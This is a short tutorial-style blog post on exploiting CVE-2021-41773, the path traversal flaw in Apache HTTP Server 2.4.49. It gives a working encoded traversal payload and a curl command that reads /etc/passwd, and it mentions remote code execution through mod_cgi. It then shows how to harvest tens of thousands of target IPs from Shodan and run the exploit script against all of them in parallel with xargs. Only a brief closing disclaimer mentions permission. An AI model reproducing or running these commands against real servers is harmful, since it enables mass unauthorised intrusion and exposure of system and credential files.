Finding and Exploiting Path traversal in apache 2.4.49 http server [CVE-2021–41773]
In October 4th Apache disclosed a vulnerability introduced on Apache HTTP Server 2.4.49 marked as CVE-2021–41773.At the same time Apache released a patch for this vulnerability with its new version 2.4.50 . This vulnerability allows an attacker to bypass path traversal protection using encoding . Bypass looks something like this.
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Its also possible to perform rce [Remote code execution] if mode_cgi is enabled . Modern web-technology doesn’t use it anymore however old website which usage old technology are still using this functionality. Exploitation process is easy which can be performed with curl also. Lets see how we can find websites using this apache version. We will use our favorite search engine shodan.io . Using this simple query we can find potentially vulnerable apache 2.4.49 http server.
"Apache/2.4.49"
We Got 78,219 results , those server usage apache 2.4.49 but all of them are not vulnerable , we need to filter the vulnerable ones , we can do that using bash , lets mix up our script with exploit. Exploit with curl was something like that.
curl --silent --path-as-is --insecure -k "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
This only exploits the server and shows us the content/text of /etc/passwd. lets create a detection script with it .
Now lets download the results from shodan. But our script takes one argument at a time how can we give it multiple input .
We can filter ip from the downloaded result using regex.
cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt
We stored all the ip on ip.txt , now lets scan it for vulnerability using our bash and xargs
cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt
we can use httprobe to detect if the target use http or https protocol.
for bug hunters , you can use the same process with all the subdomains you got.
cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt
[ This article was for educational and research purpose only , we do not promote to harm others property without permission.]